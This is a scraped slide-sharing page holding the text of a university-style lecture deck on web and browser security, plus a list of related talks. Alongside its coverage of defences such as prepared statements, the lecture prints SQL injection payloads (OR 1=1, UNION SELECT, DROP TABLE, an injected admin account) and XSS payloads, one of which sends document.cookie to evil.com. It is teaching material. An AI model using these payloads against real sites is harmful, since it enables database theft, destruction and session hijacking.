web and browser security
play

WEB AND BROWSER SECURITY Ben Livshits, Microsoft Research Web - PowerPoint PPT Presentation

May 11, 2023 •225 likes •738 views

WEB AND BROWSER SECURITY Ben Livshits, Microsoft Research Web Application Vulnerabilities & Defenses 2 Server-side woes Browser mechanisms: Same origin SQL injection Cross-domain request XSS overview Content

  1. WEB AND BROWSER SECURITY Ben Livshits, Microsoft Research

  2. Web Application Vulnerabilities & Defenses 2  Server-side woes  Browser mechanisms:  Same origin  SQL injection  Cross-domain request  XSS overview  Content security policy  XSS filters on the client  LEC 7: Server-side static and runtime analysis  LEC 8: Static client-side analysis  LEC 9: Runtime client analysis and enforcement

  3. Web Application Scenario 3 HTTP REQUEST HTTP RESPONSE client server

  4. Vulnerability Stats: Web Vulnerabilities Are Dominating 25 20 15 10 5 0 2001 2002 2003 2004 2005 2006 Web (XSS) Buffer Overflow Source: MITRE CVE trends

  5. Reported Web Vulnerabilities "In the Wild" Data from aggregator and validator of NVD-reported vulnerabilities

  6. Drilling Down A Bit… 6 Cenzic vulnerability trend report

  7. And So It Begins… 7 Source : http://xkcd.com/327/

  8. SQL Injection Attacks 8  Attacks a particular site, not (usually) a particular user  Affect applications that use untrusted input as part of an SQL query to a back-end database  Specific case of a more general problem: using untrusted input in commands

  9. SQL Injection: Example 9  Consider a browser form, e.g.:  When the user enters a number and clicks the button, this generates an http request like https://www.pizza.com/show_orders?month=10

  10. Example Continued … 10  Upon receiving the request, a Java program might produce an SQL query as follows: sql_query = "SELECT pizza, quantity, order_day " + "FROM orders " + "WHERE userid=" + session.getCurrentUserId() + " AND order_month= " + request.getParameter("month") ;  A normal query would look like: SELECT pizza, quantity, order_day FROM orders WHERE userid=4123 AND order_month=10

  11. Example Continued … 11  What if the user makes a modified http request: https://www.pizza.com/show_orders?month=0%20OR%201%3D1  (Parameters transferred in URL-encoded form, where meta-characters are encoded in ASCII)  This has the effect of setting request.getParameter (“month”) equal to the string 0 OR 1=1

  12. Example Continued 12  So the script generates the following SQL query: SELECT pizza, quantity, order_day FROM orders ( WHERE userid=4123 ) AND order_month=0 OR 1=1  Since AND takes precedence over OR, the above always evaluates to TRUE  The attacker gets every entry in the database!

  13. Even Worse … 13  Craft an http request that generates an SQL query like the following: SELECT pizza, quantity, order_day FROM orders WHERE userid=4123 AND order_month=0 OR 1=0 UNION SELECT cardholder, number, exp_date FROM creditcards  Attacker gets the entire credit card database as well!

  14. More Damage … 14  SQL queries can encode multiple commands, separated by ‘;’  Craft an http request that generates an SQL query like the following: SELECT pizza, quantity, order_day FROM orders WHERE userid=4123 AND order_month=0 ; DROP TABLE creditcards  Credit card table deleted!  DoS attack

  15. More Damage … 15  Craft an http request that generates an SQL query like the following: SELECT pizza, quantity, order_day FROM orders WHERE userid=4123 AND order_month=0 ; INSERT INTO admin VALUES („hacker‟, ...)  User (with chosen password) entered as an administrator!  Database owned!

  16. May Need to be More Clever … 16  Consider the following script for text queries: sql_query = "SELECT pizza, quantity, order_day " + "FROM orders " + "WHERE userid=" + session.getCurrentUserId() + " AND topping= „ " + request.getParameter (“topping") + “‟”  Previous attacks will not work directly, since the commands will be quoted  But easy to deal with this…

  17. Example Continued … 17  Craft an http request where request.getParameter (“topping”) is set to abc ‟; DROP TABLE creditcards; --  The effect is to generate the SQL query: SELECT pizza, quantity, order_day FROM orders WHERE userid=4123 AND toppings=„ abc ‟; DROP TABLE creditcards ; -- ‟  (‘ -- ’ represents an SQL comment)

  18. Mitigation? Solutions? 18  Blacklisting  Whitelisting  Encoding routines  Prepared statements/bind variables  Mitigate the impact of SQL injection

  19. Blacklisting? 19  I.e., searching for/preventing ‘bad’ inputs  E.g., for previous example: sql_query = "SELECT pizza, quantity, order_day " + "FROM orders " + "WHERE userid=" + session.getCurrentUserId() + " AND topping= „ " + kill_chars( request.getParameter (“topping")) + “‟”  … where kill_chars() deletes, e.g., quotes and semicolons

  20. Drawbacks of Blacklisting 20  How do you know if/when you’ve eliminated all possible ‘bad’ strings?  If you miss one, could allow successful attack  Does not prevent first set of attacks (numeric values)  Although similar approach could be used, starts to get complex!  May conflict with functionality of the database  E.g., user with name O’Brien

  21. Whitelisting 21  Check that user-provided input is in some set of values known to be safe  E.g., check that month is an integer in the right range  If invalid input detected, better to reject it than to try to fix it  Fixes may introduce vulnerabilities  Principle of fail-safe defaults

  22. Prepared Statements/bind Variables 22  Prepared statements : static queries with bind variables  Variables not involved in query parsing  Bind variables: placeholders guaranteed to be data in correct format

  23. A SQL Injection Example in Java 23 PreparedStatement ps = db.prepareStatement( "SELECT pizza, quantity, order_day " + "FROM orders WHERE userid=? AND order_month=?"); ps.setInt(1, session.getCurrentUserId()); ps.setInt(2, Integer.parseInt(request.getParameter("month"))); ResultSet res = ps.executeQuery(); Bind variables

  24. There’s Even More 24  Practical SQL Injection: Bit by Bit  Teaches you how to reconstruct entire databases  Overall, SQL injection is easy to fix by banning certain APIs  Prevent queryExecute-type calls with non-constant arguments  Very easy to automate  See a tool like LAPSE that does it for Java

  25. SQL Injection in the Real World  CardSystems was a major credit card processing company  Put out of business by a SQL injection attack  Credit card numbers stored unencrypted  Data on 263,000 accounts stolen  43 million identities exposed

  26. Web Attacker 3  Controls malicious website (attacker.com)  Can even obtain SSL/TLS certificate for his site  User visits attacker.com – why?  Phishing email  Enticing content  Search results  Placed by ad network  Blind luck …  Attacker has no other access to user machine!

  27. Cross-site Scripting 27  If the application is not careful to encode its output data, an attacker can inject script into the output out.writeln (“<div>”); out.writeln(req.getParameter (“name”)); out.writeln (“</div>”);  name: <script>…; xhr.send(document.cookie);</script>

  28. XSS: Baby Steps 28 http://example.com/test.php?color=red&background=pink.

  29. XSS: Simple Things are Easy 29 http://example.com/test.php?color=green&background= </style><script>document.write(String.fromCharCode(88,83,83))</script>

  30. Is It Easy to Get Right? 30

  31. XSSED.org: In Search of XSS 31

  32. One of the Reports on XSSED 32

  33. Repro 33

  34. 2006 Example Vulnerability 34

  35. 2006 Example Vulnerability Attackers contacted users via email and fooled them into accessing 1) a particular URL hosted on the legitimate PayPal website Injected code redirected PayPal visitors to a page warning users 2) their accounts had been compromised Victims were then redirected to a phishing site and prompted to 3) enter sensitive financial data Source: http://www.acunetix.cz/news/paypal.htm

  36. Consequences of XSS 36  Cookie theft: most common  http://host/a.php?variable="><script>document .location='http://www.evil.com/cgi- bin/cookie.cgi? '%20+document.cookie</script>  But also  Setting cookies  Injecting code into running application  Injecting a key logger  etc.

  37. XSS Defenses 37  Simple ones  Compare IP address and cookie  Cookie HttpOnly attribute  There’s much more to be covered later

  38. Taxonomy of XSS 38  XSS-0 : client-side  XSS-1 : reflective  XSS-2 : persistent

  39. 39 What is at the Root of the XSS Problem?

  40. Memory Exploits and Web App Vulnerabilities Compared 40  Buffer overruns  Cross-site scripting  Stack-based  XSS-0, -1, -2, -3  Return-to-libc, etc.  Requires careful programming  Heap-based  Static analysis tools  Heap spraying attacks  Requires careful programming or  SQL injection memory-safe languages  Generally, better, more  Don’t always help as in the case restrictive APIs are enough of JavaScript-based spraying  Simple static tools help  Static analysis tools  Format string vulnerabilies  Generally, better, more restrictive APIs are enough  Simple static tools help

  41. Intro to Browser Security 41

Recommend

Browser and Network request Browser website CS 4803 reply Network OS Computer and Network

Browser and Network request Browser website CS 4803 reply Network OS Computer and Network

Browser and Network request Browser website CS 4803 reply Network OS Computer and Network Security Hardware Alexandra (Sasha) Boldyreva Browser sends requests May reveal private information (in forms, cookies) Web security.

517 views • 7 slides
CSCI-UA.9480 Introduction to Computer Security Session 4.1 Browser Security Model Prof. Nadim

CSCI-UA.9480 Introduction to Computer Security Session 4.1 Browser Security Model Prof. Nadim

CSCI-UA.9480 Introduction to Computer Security Session 4.1 Browser Security Model Prof. Nadim Kobeissi Defining 4.1a Browser Security Goals Also before we start: Practical Assignment 2 is now online . 2 CSCI-UA.9480: Introduction to

520 views • 28 slides
Web Security [Browser Security Model] Spring 2020 Franziska (Franzi) Roesner

Web Security [Browser Security Model] Spring 2020 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Web Security [Browser Security Model] Spring 2020 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, Ada Lerner, John

810 views • 24 slides
Web Security [SSL/TLS and Browser Security Model] Fall 2017 Franziska (Franzi) Roesner

Web Security [SSL/TLS and Browser Security Model] Fall 2017 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Web Security [SSL/TLS and Browser Security Model] Fall 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, Ada Lerner,

570 views • 43 slides
CS-527 Software Security Browser Security Asst. Prof. Mathias Payer Department of Computer

CS-527 Software Security Browser Security Asst. Prof. Mathias Payer Department of Computer

CS-527 Software Security Browser Security Asst. Prof. Mathias Payer Department of Computer Science Purdue University TA: Kyriakos Ispoglou https://nebelwelt.net/teaching/17-527-SoftSec/ Spring 2017 Web Environment Table of Contents Web

434 views • 16 slides
Lecture 26 Browser Security Stephen Checkoway Oberlin College Some slides from Bailey's ECE

Lecture 26 Browser Security Stephen Checkoway Oberlin College Some slides from Bailey's ECE

Lecture 26 Browser Security Stephen Checkoway Oberlin College Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised of - HTML - JavaScript - Style sheets (CSS) - Images - Sounds - Movies -

1.74k views • 129 slides
Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall

Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall

Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised of - HTML - JavaScript - Style

1.67k views • 129 slides
Web Security! Big Picture: Browser and Network request website Browser reply OS Network

Web Security! Big Picture: Browser and Network request website Browser reply OS Network

CSE 484 / CSE M 584: Computer Security and Privacy CSRF and XSS attacks Fall 2016 Ada (Adam) Lerner lerner@cs.washington.edu Thanks to Franzi Roesner, Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John Manferdelli, John Mitchell,

1.29k views • 59 slides
CO CO 447 | LEC EC 4 ADVANCED TOPICS OF WEB SECURITY MODEL AND ITS PITFALLS BROWSER

CO CO 447 | LEC EC 4 ADVANCED TOPICS OF WEB SECURITY MODEL AND ITS PITFALLS BROWSER

CO CO 447 | LEC EC 4 ADVANCED TOPICS OF WEB SECURITY MODEL AND ITS PITFALLS BROWSER VULNERABILITIES Dr. Benjamin Livshits Drive-by malware 3 4 Go Google le patch ches Chrome zero-da day under under active e at attacks 6 Con

920 views • 62 slides
CS419 Spring 2010 Computer Security Vinod Ganapathy Lecture 17: Web Security Slide credits:

CS419 Spring 2010 Computer Security Vinod Ganapathy Lecture 17: Web Security Slide credits:

CS419 Spring 2010 Computer Security Vinod Ganapathy Lecture 17: Web Security Slide credits: Prof. Vitaly Shmatikov, UT-Austin. Browser and Network request website Browser reply Network OS Hardware February 12, 2002 Microsoft Issues

834 views • 62 slides
Browser Security Part 1 Background Web Server Browser Serves content Represents content

Browser Security Part 1 Background Web Server Browser Serves content Represents content

Browser Security Part 1 Background Web Server Browser Serves content Represents content Static Static (HTML) Dynamic Dynamic (XML, ASP, JSP) Server-side scripts Client-side scripts (JScript) Fetch content from

621 views • 24 slides
FIT5124 Advanced Topics in Security Hacking Techniques III Web Browser Exploitation Ron

FIT5124 Advanced Topics in Security Hacking Techniques III Web Browser Exploitation Ron

FIT5124 Advanced Topics in Security Hacking Techniques III Web Browser Exploitation Ron Steinfeld Clayton School of IT Monash University April 2015 Ron Steinfeld FIT5124 Advanced Topics in SecurityHacking Techniques III Web Browser

2.56k views • 17 slides
CO 445H ADVANCED TOPICS OF WEB SECURITY MODEL AND ITS PITFALLS BROWSER VULNERABILITIES Dr.

CO 445H ADVANCED TOPICS OF WEB SECURITY MODEL AND ITS PITFALLS BROWSER VULNERABILITIES Dr.

CO 445H ADVANCED TOPICS OF WEB SECURITY MODEL AND ITS PITFALLS BROWSER VULNERABILITIES Dr. Benjamin Livshits British Airw rways Hack 2 BA last week admitted that personal and payment card info for 380,000 customers had been swiped from

840 views • 61 slides
ConScript Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser

ConScript Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser

ConScript Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser Leo Meyerovich Benjamin Livshits UC Berkeley Microsoft Research Web Programmability Platform openid.net yelp.com adsense.com Google maps 2

727 views • 41 slides
CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2

CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2

CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2 XSS-0 : client-side XSS-1 : reflective XSS-2 : persistent XSS Is Exceedingly Common 3 Web Hacking Incident Database (1999 -

887 views • 44 slides
Security Signature Inference for JavaScript-based Browser Addons Vineeth Kashyap , Ben Hardekopf

Security Signature Inference for JavaScript-based Browser Addons Vineeth Kashyap , Ben Hardekopf

Security Signature Inference for JavaScript-based Browser Addons Vineeth Kashyap , Ben Hardekopf University of California Santa Barbara CGO 2014 1 JavaScript-based Browser Addons 2 Addons: JavaScript with High Privileges 3

898 views • 56 slides
Firefox Security Sid Stamm &lt;sid@mozilla.com&gt; Browser as a Protector Protect Site

Firefox Security Sid Stamm &lt;sid@mozilla.com&gt; Browser as a Protector Protect Site

Firefox Security Sid Stamm &lt;sid@mozilla.com&gt; Browser as a Protector Protect Site Content Safe Platform Third-Party Features Keeping your Secrets Content Restrictions Content Security Policy Content Restrictions Document

560 views • 43 slides
Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems Browser same origin policy Key security principle: a web browser permits scripts contained in a first web page to access data in a second web page,

358 views • 22 slides
Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems Browser same origin policy Key security principle: a web browser permits scripts contained in a first web page to access data in a second web page,

1.12k views • 25 slides
Security Types for Web Applications Introduction Goals Browser security Antoine Delignat-Lavaud

Security Types for Web Applications Introduction Goals Browser security Antoine Delignat-Lavaud

Security Types for Web Applications Antoine Delignat- Lavaud Security Types for Web Applications Introduction Goals Browser security Antoine Delignat-Lavaud Our contribution Review of Host-Proof Web Applications Under the supervision of

1.5k views • 108 slides
Crossing the Chasm Pitching Security Research to Mainstream Browser Vendors Collin Jackson

Crossing the Chasm Pitching Security Research to Mainstream Browser Vendors Collin Jackson

Crossing the Chasm Pitching Security Research to Mainstream Browser Vendors Collin Jackson Carnegie Mellon University Why a security feature is like a startup &lt;10 users ~1 million users &gt;1 billion users Ideas trying to cross the chasm

825 views • 46 slides
Browser Security Part 2 Recap XSS 3 different types Common aim/theme Steal user

Browser Security Part 2 Recap XSS 3 different types Common aim/theme Steal user

Browser Security Part 2 Recap XSS 3 different types Common aim/theme Steal user credentials (session ID, cookies, etc.) CSRF Cross-Site Request Forgery is an attack that forces an end user to execute unwanted actions on a

428 views • 23 slides
Security and Usability from the Frontlines of Enterprise IT Jon Oberheide CTO, Duo Security

Security and Usability from the Frontlines of Enterprise IT Jon Oberheide CTO, Duo Security

Security and Usability from the Frontlines of Enterprise IT Jon Oberheide CTO, Duo Security Browser SSL Password Encryption warnings schemes usability IT Security 40M consumer 153M end user Thousands of credit cards credentials

785 views • 39 slides
MODERN WEB SECURITY GRAD SEC SEP 21 2017 TODAYS PAPERS Misleading users Browser

MODERN WEB SECURITY GRAD SEC SEP 21 2017 TODAYS PAPERS Misleading users Browser

MODERN WEB SECURITY GRAD SEC SEP 21 2017 TODAYS PAPERS Misleading users Browser assumes that clicks and keystrokes = clear indication of what the user wants to do Constitutes part of the users trusted path Attacker can

619 views • 38 slides

More recommend